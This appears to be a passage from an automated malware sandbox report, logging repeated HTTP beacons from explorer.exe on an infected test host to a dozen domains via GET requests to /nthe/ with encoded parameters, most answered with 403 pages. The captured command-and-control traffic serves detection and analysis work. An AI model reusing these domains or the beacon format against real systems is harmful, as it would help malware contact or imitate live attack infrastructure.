                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      11192.168.2.224918634.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:30.639823914 CEST607OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
                                                                                      Host: www.authorjameswshepherdonline.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:30.756135941 CEST608INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      12192.168.2.224919134.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:05.497116089 CEST614OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
                                                                                      Host: www.hanlansmojitovillage.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:05.612250090 CEST615INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      13192.168.2.224919534.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:43.718801022 CEST618OUTGET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.thaysay.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:43.833789110 CEST618INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:43 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      14192.168.2.224919734.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:53.937608004 CEST620OUTGET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.onpar-golf.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:54.053649902 CEST620INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:53 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      15192.168.2.2249198192.99.131.25280C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:22:59.159507036 CEST621OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:59.269926071 CEST622INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:22:59 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 65 72 69 63 61 6e 73 74 6f 6e 65 73 75 73 61 2e 63 6f 6d 2f 6e 74 68 65 2f 3f 74 34 38 74 4a 3d 66 4a 45 70 5f 48 4e 38 6d 50 69 54 48 4e 35 50 26 61 6d 70 3b 35 6a 6f 34 6e 72 3d 54 69 57 6b 67 48 34 55 6b 43 37 43 49 71 7a 39 6b 74 63 52 51 79 53 6e 6f 74 2f 68 53 50 30 55 38 34 59 5a 6b 31 51 47 4f 35 7a 2f 68 41 52 69 6e 31 6e 67 36 72 78 55 34 59 2b 2b 73 79 36 59 64 47 70 69 7a 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      16192.168.2.224919934.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:23:04.295397043 CEST622OUTGET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:23:04.410657883 CEST623INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:04 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      17192.168.2.224920034.98.99.3080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:23:09.429909945 CEST623OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:23:09.545253038 CEST624INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.224916934.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:18:05.019635916 CEST586OUTGET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:05.138832092 CEST587INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.224917034.98.99.3080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:18:10.217118979 CEST588OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:10.331685066 CEST588INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.224917134.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:18:20.416021109 CEST589OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
                                                                                      Host: www.authorjameswshepherdonline.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:20.531202078 CEST590INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:20 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.224917634.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:19:13.157188892 CEST596OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
                                                                                      Host: www.hanlansmojitovillage.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:13.272679090 CEST596INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
